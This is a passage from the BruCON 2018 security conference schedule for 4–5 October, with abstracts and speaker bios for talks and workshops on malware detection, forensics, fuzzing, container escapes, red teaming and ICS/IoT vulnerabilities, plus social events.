
During the second half of the talk, we dwell into some of the automated remediation and incident response capabilities built into the Windows Defender ATP product and how it can be used for handsfree triage and remediation through the use of automation playbooks (Hexadite). We cover scenarios from basic malware / hunting techniques such as frequency analysis, process trees and other indicators that may indicate suspicious behaviors. 

In closing, we round up the topics covered, provide some disclaimers that this is not a silver bullet to all attacks and simply reinforce the message that basic hygiene and a handful of properly implemented controls are indeed effective in disrupting the killchain.

Speakers
VB

Vineet Bhatia

Vineet Bhatia (@ThreatHunting) runs cybersecurity operations. His work focuses on digital forensics, threat hunting and aviation cybersecurity.


Thursday October 4, 2018 16:30 - 17:30
01. Westvleteren University

17:30

Hunting Android Malware: A novel runtime technique for identifying malicious applications
In this research, we propose a novel technique to identify malicious Android applications through the use of analyzing the HEAP of Android applications at runtime. 

Android malware is a continuing problem in the Android ecosystem, even after 8 major Android releases. Android currently relies on implicit and explicit user participation to identify malicious applications, both on the Playstore and on devices. Currently multiple techniques exist to identify malware such as code signatures, hashes, permission analysis and manual static analysis. These techniques rely on the premise that who or what is performing the analysis, is required to have access to the Android application (APK). However, performing these analysis techniques on devices is resource intensive, time consuming and also dependent on access to the APK. 

What if no access to the APK is required to identify if an application is malicious? Currently no capability exists to scan for malicious applications at runtime on Android devices, at best there is static analysis on the application and its permissions. Additionally there is the Android Attestation framework, which attempts to provide information on the state of the device but does not provide information on the state of running applications. 

In this research, we propose a novel technique to identify malicious Android applications through the use of analyzing the HEAP of Android applications at runtime. The technique proposed does not require access to the contents of the APK nor does it require write access to the application sandbox or memory, only read access to the process HEAP. The analysis of the HEAP allows for the proposed technique to identify the instantiated objects for a particular application. The indentification and analysis of instantiated objects for Android applications can be used to effectively identify applications that are making use of, and implementing dangerous functionality such as DexClass loaders and other well known objects that exhibit malicious behaviour. 

The results of this research are showcased as a PoC, which shows how the technique can be bundled into the Android ecosystem as part of the Android Attestation Framework. The inclusion of this research as a system service via the Attestation Framework can enable the Android operating system or user to identify malicious applications at runtime via any Android application.

Speakers
avatar for Christopher Le Roy

Christopher Le Roy

Chris is a security researcher based in London. He has not had an unusual entrance to infosec coming from a Computer Science background which led him to dabble in software development for sometime. This resulted in Chris realising he is a terrible dev and prefers breaking things which... Read More →


Thursday October 4, 2018 17:30 - 18:30
01. Westvleteren University

21:30

BruCON Party
Join us at the BruCON party on Thursday (2018-10-04) Evening !

Location: Le bateau. Muinkkaai 1, 9000 Ghent

Note: This is a boat, a real one!




Thursday October 4, 2018 21:30 - 23:59
BruCON Party Muinkkaai 1, 9000 Gent, Belgium
 
Friday, October 5
 

07:30

Hacker Run (10K)
What better way is there to start the second conference day than running 10km with a bunch of hackers?

Put on your running shoes and join us at the entrance of the Novotel (workshop venue) on Friday at 7:30.

We’ll be back in time to freshen up and attend the first presentation of the day.

Word is that it’s also a good way to get rid of a hangover!

Friday October 5, 2018 07:30 - 08:30
Novotel Novotel Ghent

08:30

Registration & Breakfast
Friday October 5, 2018 08:30 - 10:00
00. Lounge University

10:00

Keynote - 5.256e+6 minutes in a decade
There are 5.256e+6 minutes in a decade, and in all of those minutes, a lot has changed since BruCon first started. This keynote puts on the rose-tinted glasses and delves into some of the more pressing issues we've faced over the past decade and tries to understand if we are getting better, or if things are still the same

Speakers
avatar for Daniel Cuthbert

Daniel Cuthbert

Daniel Cuthbert is the Global Head of Cyber Security Research for Grupo Santander. With a career spanning over 20+ years on both the offensive and defensive side, he’s seen the evolution of hacking from small groups of curious minds to organised criminal networks and nation state... Read More →


Friday October 5, 2018 10:00 - 11:00
01. Westvleteren University

10:00

ICS and IoT Village
Friday October 5, 2018 10:00 - 18:00
02. Westmalle University

10:30

A goldmine within an ocean of data – basics of network forensics
Limited Capacity filling up

/!\ Important Notice /!\

For The workshop, the participants are requested to download the SOF-ELK Virtual Machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding usefull things in this stream can be overwelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finalize we'll tackle the subject of automating the process.

Speakers
avatar for Andy Deweirt

Andy Deweirt

I’m a security consultant with over 10 year of experience in infosecurity. I've built firewalls, architected solutions, tested security, broke infrastructure and built soc capabilities, A main thread within the multiple roles and assignments has mostly been network security. As... Read More →


Friday October 5, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Finding security vulnerabilities with modern fuzzing techniques (Short Version)
Limited Capacity filling up

Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints according common problems and pitfalls during fuzzing will be given. After discussing the theories behind modern fuzzing techniques we look at famouse fuzzers and how they can be used to find real-world vulnerabilities. In the second part important areas which influent the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
avatar for Rene Freingruber

Rene Freingruber

Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He operates research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques... Read More →


Friday October 5, 2018 10:30 - 12:30
06. Rochefort Novotel

10:30

ICS Forensic Workshop
Limited Capacity filling up

You are an incident responder working for a nuclear waste management system. An incident has taken place in the industrial environment where a number of valves for the main waste storage tank are sporadically opening and closing. The valves are controlled by a PLC and the local security operations centre (SOC), suspect that it may be due to an attack against the PLC. You are provided a network pcap file and a dump of the data-blocks from the PLC for analysis. You are expected to analyse the data to attempt to determine what occurred and how the behaviour of the valve has been modified.

Speakers
avatar for Joe Stirland

Joe Stirland

Joe Stirland is a senior scientist and technical Lead for the Airbus DTO – ZSCA Cyber Forensics lab and is responsible for state of the art research within the cyber forensics field in support of Airbus (Airbus, Airbus Helicopters, Airbus Defence & Space, and Airbus HQ). He holds... Read More →


Friday October 5, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

Jedi tricks to convince your boss (Episode 2)
Limited Capacity filling up

The 2017 Global Information Security Workforce Study showed that communication skills are the most wanted competences seeked by 66% of hiring managers while only 25% of security professionals put these skills on their developpment track.
Today, in most organizations, it is unlikely you will be able to improve your company's security if you're not able to convince people to move towards the right direction. Assertiveness

Speakers
avatar for Emmanuel Nicaise

Emmanuel Nicaise

Emmanuel Nicaise has 25 years of experience in IT amongst which about 19 in security. With a degree in IT and a master’s in clinical psychology, he’s naturally focusing on human-centric security management and on the different ways to foster a better security culture in organizations... Read More →


Friday October 5, 2018 10:30 - 12:30
04. Orval Novotel

11:00

Exploits in Wetware
Robert discusses his third place experience at the Defcon 2017 SE CTF and how his efforts clearly show how easy it is to get sensitive information from any organization. The 2017 Verizon report clearly shows the dramatic growth rate of social engineering attacks and Robert demonstrates how he collected hundreds of data points from the target organization using OSINT techniques. He then goes into the vishing strategy he implemented to maximize the points he collected in the 20 minute live contest. Without much effort Robert was able to know their VPN, OS, patch level, executive personal cell phone numbers and place of residence. 
Robert lifts the curtain of the social engineering world by showing tricks of the trade such as the “incorrect confirmation” which is one of many methods to loosen the tongues of his marks. Robert then shows the pretexts he designed to attack companies and the emotional response each pretext is designed to trigger. By knowing these patters we can better educate our staff. 
With that much information at his fingertips, how long would it take him to convince your executive to make a bank transfer? If your organization lost a few million dollars due to social engineering, who would be to blame? Are you insured for that? Who is getting fired? 
Robert wraps up his talk with a series of strategies companies can take to reduce exposure and risk. He goes over current exposure, building defenses, getting on the offense and finally… a culture shift. 

Speakers
avatar for Robert Sell

Robert Sell

Robert is a Senior IT Manager in the aerospace industry where he spends most of his time managing InfoSec teams. While his teams focus on the traditional blue/red team exercises, lately he has spent an increasing amount of time building defenses against social engineering. Robert... Read More →


Friday October 5, 2018 11:00 - 12:00
01. Westvleteren University

11:00

Operator Jail Breakout
Operator stations are today one of the first systems/stations to interact with a distributed control system (DCS) or other industrial control systems. These operator stations often have some protection built in to restrict what the operator can do within the SCADA software and/or on the operating system itself.

Within this presentation, some of the most (easily) discovered ways are shown/explained and how these can be (ab)used to gain a further foothold within the environment.

The audience will learn more on the shortcomings of most of the operator jail solutions and what could be done to step up this game to secure this properly. Key takeaways obtained by the audience through this presentation is that you cannot trust operator jails in the thought that it properly protects attackers from gaining access to the operating system itself and thus potentially exploiting the whole DCS environment.

Speakers
avatar for Frank Lycops

Frank Lycops

Frank a freelance security consultant and researcher. He has 8 years of experience in both the IT and OT environments. During his work, he performed numerous penetration tests on OT environments, helped improving the overall security of various environments and discovered several... Read More →
DS

Dieter Sarrazyn

Dieter is a freelance OT security expert who working extensively on industrial control system security including more than 10 years in a large electricity generation company. He performs SCADA security assessments, provides assistance in securing SCADA environments and helps customers... Read More →


Friday October 5, 2018 11:00 - 12:00
02. Westmalle University

12:00

Outside the Box: Breakouts and Privilege Escalation in Container Environments
Containers have quickly become a standard feature of most application and infrastructure stacks. The benefits of containers are numerous, with ease of use being a primary motivator. This has seen adoption by numerous cloud service providers. Application containers are expected to be a $2.7bn market by 2020[1]. The most popular container solution, Docker, has had 14 million hosts accessing their public Docker Hub, pulling down 12 billion container images[2]. At least 40% of organizations using Docker are also using a container orchestration service such as Kubernetes, Mesos, Amazon ECS, or Google Container Engine[3]. 

Escaping these container solutions is seen as a hard problem, requiring kernel vulnerabilities, bespoke ROP chains, or framework flaws. This is not the case! In this talk we will explore, from an attacker's perspective, real-world exploitable setups we've encountered. We will demonstrate numerous container escapes, including exposed Docker daemons and Kubernetes API access in multi-tenant environments, weak Linux capability blacklists and seccomp bypasses. These are not theoretical vulnerabilities or contrived lab examples, but actual misconfigurations we've seen in large cloud service providers. 

Many container operators and developers don't understand the implication of certain configurations and the attack surface presented by the confluence of the container technology's surface area and Linux kernel and other subsystem interactions. Secure design and configuration of a container environment requires a deep understanding of Unix sockets, networking, namespaces, and an equally deep understanding of container RPC and orchestration endpoints. Small, easy to overlook missteps like using the wrong network namespace or exporting the wrong port, or overlooking one of the hundreds of Linux syscalls can have disastrous results. 

The talk will provide a methodology that security professionals can use when assessing containerized environments and we will demonstrate attacks against common deployments. We will also cover configuration recommendations for engineers to avoid these mistakes and tools you can use to check for a safe configuration. 

Speakers
avatar for Craig Ingram

Craig Ingram

Craig is a Principal Platform Security Engineer at Salesforce with over 12 years experience working in the security industry. At Salesforce Craig is hands-on with secure SDL/DevOps implementation and automation, penetration testing, and security research including reverse engineering... Read More →
avatar for Etienne Stalmans

Etienne Stalmans

Etienne is a member of the Public Cloud Security Group at Salesforce, and a security researcher with a keen interest in protocol reversing and finding ways to abuse functionality in everyday products. He completed a MSc in Network Security, focusing on Botnets and DNS. He has spoken... Read More →


Friday October 5, 2018 12:00 - 13:00
01. Westvleteren University

13:00

Lunch
Friday October 5, 2018 13:00 - 14:00
00. Lounge University

13:30

The story of greendale
Limited Capacity filling up

Ever wanted to do forensics and feel good about it? This workshop will introduce you to a suite of open-source tools for all things digital forensics and incident response. You will see how Greendale (a fictitious but very famous university) used this set of tools to articulate an effective response to a pretty severe incident last summer—all on a state-financed university budget! We will cover collection of forensic evidence with GRR, processing with Plaso, and analysis with Timesketch; how these tools can be articulated using dftimewolf, how to remotely image disks and have the processing done in the Cloud.

Speakers
avatar for Thomas Chopitea

Thomas Chopitea

Thomas is a forensics investigator and engineer at Google. He focuses on digital forensics, incident response, and building the bricks that make his team’s investigation and response process as smooth and efficient as possible. His long-term professional goal is to automate himself... Read More →
avatar for Daniel White

Daniel White

Daniel White is a security engineer at Google and the tech lead for the Plaso project. He is focused on keeping people and data safe. He works on forensics, incident response and tool development.


Friday October 5, 2018 13:30 - 16:30
03. Chimay Novotel

13:30

Active Directory Redteaming : Attacking the backbone of Enterprise environments
Limited Capacity filling up

This workshop covers attacking an Active Directory environment using
built-in tools like PowerShell and other MS signed binaries. Using the
assume breach methodology, we start as a normal user in domain and
silently work our way up to the highest privileges at the enterprise level.

We will focus on not touching disk, abuse of functionality and evading
detection mechanisms to avoid detection and still achieve true domain
dominance.

Speakers
avatar for Nikhil Mittal

Nikhil Mittal

Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security... Read More →


Friday October 5, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore!
Limited Capacity filling up

The cyber attack landscape has changed.  Malicious adversaries continue to enhance techniques used to exploit enterprise networks.  A key ingredient missing from our cyber experts is a better way to hunt for adversarial presence.  The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release a new frameworks called Excalibur TIE Mark I, and Themis Network Analyzer that allows investigators to better way to hunt for new threats in real-time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts both from each host machine and directly from the enterprise network.  This system develops real indicators of compromise (IOC) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented with algorithms used to analyze, correlate, and produce IOCs allowing the investigator to better hunt for new threats, populate uniform data sets best for information dissemination and analysis, and create new visualization graphs used for the human to derive meaning from vast amounts of data aggregation.  Finally, this talk applies everything we’ve learned and shows how to create new distributed network sensors and deploy IOCs discovered from the Threat Intelligence Engine to better protect the enterprise network.  Rest assured, lots of live demos are included in this talk.  And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers
avatar for Solomon Sonya

Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms... Read More →


Friday October 5, 2018 13:30 - 17:30
04. Orval Novotel

14:00

Dissecting Of Non-Malicious Artifacts: One IP At A Time
For years and years, anti-malware solutions, across many levels of the network, have been assisted by online anti-virus aggregation services and online sandboxes to extend their detection level and identify unknown threats. But this power booster comes with a price tag. Even today, enterprises all over the world are using security solutions that instead of protecting the data, are suspecting it as malicious and sharing it with online multi-scanners. The result is drastic. What separates a hacker from extracting all that data on a daily basis is a couple of hundreds euros, monthly. A price which could be covered easily if that hacker finds a man of interest. In just a couple of days, one skilled hacker can build an intelligence platform that could be sold in 10 times the money they invested.
The data is being leaked daily and the variety is endless. In our research, we dived into these malware-scanning giants and built sophisticated Yara rules to capture non-malicious artifacts and dissect them from secrets you've never thought possible of getting out of their chamber. But that’s not all. 
We will show the audience how we built an intelligence tool, that upon insertion of an API key, will auto-dissect a full dataset. In our talk we reveal the awful truth about allowing internally installed security products to be romantically involved with online scanners.

Speakers
avatar for Dani Goland

Dani Goland

Dani Goland is a 23 year old coding machine. At the age of 20 he founded his own boutique company for innovative software and hardware solutions. While gaining experience in the business field, Dani did not neglect his hands-on capabilities. In just a short while he won two coding... Read More →
avatar for Ido Naor

Ido Naor

Ido Naor is a Senior Security Researcher at GReAT, a team of researchers who've been tasked by Kaspersky Lab to investigate the most prolific APT incidents, ransomware distribution, banking heists and other type of internet hacking monsters. Ido's focusing on threats in the middle... Read More →


Friday October 5, 2018 14:00 - 15:00
01. Westvleteren University

15:00

IoT RCE, a Study With Disney
As desktop and server security keeps raising the baseline for successful exploitation,IOT devices are still stuck in the 1990's, despite their ubiquity in every home network. This, coupled with the ability to access them from anywhere is creating a time-bomb situation in which millions of households are left vulnerable, regardless of any network security posture. 

These topics will be examined using the "Circle with Disney" and Foscam devices as case studies. During the course of the vulnerability testing of these devices, over 50 CVEs were discovered, out of which, discussion will focus on the more novel attack techniques seen within the Disney Circle, including: 
- SSL certificate Attribute validation bypasses 
- SSID Broadcasting injection 
- Use-Between-Realloc Memory Corruption. 
- Cloud Routing Abuse 

Finally, there will be discussion IOT device's use of traditionally offensive tools (arp-poisoning, backdoors, and beaconing) for central functionality. 

Speakers
avatar for Lilith Wyatt

Lilith Wyatt

Lilith is a Research Engineer with the Talos Security Intelligence and Research Group at Cisco. She's done open source and closed source research on a variety of products, resulting in CVEs on products from vendors including Vmware and Zabbix, and has also done internal research on... Read More →


Friday October 5, 2018 15:00 - 16:00
01. Westvleteren University

16:00

Coffee Break
Friday October 5, 2018 16:00 - 16:30
00. Lounge University

16:00

Mat's beard Shaving
Our fund raising for CyberSkool has been a success !

Will Mat shave his beard ?!

Come and find out !

Friday October 5, 2018 16:00 - 16:30
01. Westvleteren University

16:30

Mirror on the wall: using blue team techniques in red team ops
When performing multi-month, multi-C2teamserver and multi-scenario red team operations, you are working with an infrastructure that becomes very large quickly. This makes it harder to keep track of what is happening on it. Coupled with the ever-increasing maturity of blue teams, this makes it more likely the blue team is somewhere analysing parts of your infra and/or artefacts. In this presentation we’ll show you how you can use that to your advantage. We’ll present different ways to keep track of the blue team’s analyses and detections, and to dynamically adjust your infra to fool the blue team. We will first set the scene by explaining common and lesser known components of red teaming infrastructures, e.g. dynamic redirectors, domain fronting revisited, decoy websites, html-smuggling, etc. Secondly, we’ll show how to centralize all your infrastructure’s and ops’ information to an ELK stack, leaving it open for intelligent querying across the entire infrastructure and operation. This will also help with better feedback to the blue team at the end of the engagement. Lastly, we’ll dive into novel ways of detecting a blue team’s investigation and we’ll give examples on how to react to these actions, for example by creating honeypots for the blue team.  

Speakers
avatar for Mark Bergman

Mark Bergman

Starting coding COBOL85 at the ING mainframes at the age of 16 I swiftly learned several programming languages and querying formats. After aiding in compiling the first TCP/IP stack on the ING test mainframe I decided to dive into WinNT development and before I knew it I was digging... Read More →
avatar for Marc Smeets

Marc Smeets

Marc is a senior IT security expert, red teamer and ethical hacker. With 12 years experience in IT security and 3 years in IT operations he knows how to ‘make’ and ‘break’. In early 2016, he co-founded Outflank; a new company solely focussed on red teaming, complex penetration... Read More →


Friday October 5, 2018 16:30 - 17:30
01. Westvleteren University

17:30

Process Control through Counterfeit Comms: using and abusing built-in functionality to own a PLC
Programmable Logic Controllers (PLCs) are devices that factories, office  buildings, and utilities, among other facilities, use to control the processes running in their environment. These devices were designed to do their job and do it well, however they were not built to protect against malicious actors. This talk walks through some of the vulnerabilities discovered while investigating a well known PLC, discussing some of the  methodologies used in discovery and showing how stringing together a few seemingly minor vulnerabilities can result in device takeover. 

Speakers
avatar for Jared Rittle

Jared Rittle

Jared Rittle is a security researcher with Cisco Talos who spends his time focusing on the discovery, exploitation, and coverage of vulnerabilities in the embedded systems found in Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA), and Internet of... Read More →


Friday October 5, 2018 17:30 - 18:30
01. Westvleteren University

18:30

BruCON Closing
Friday October 5, 2018 18:30 - 18:45
01. Westvleteren University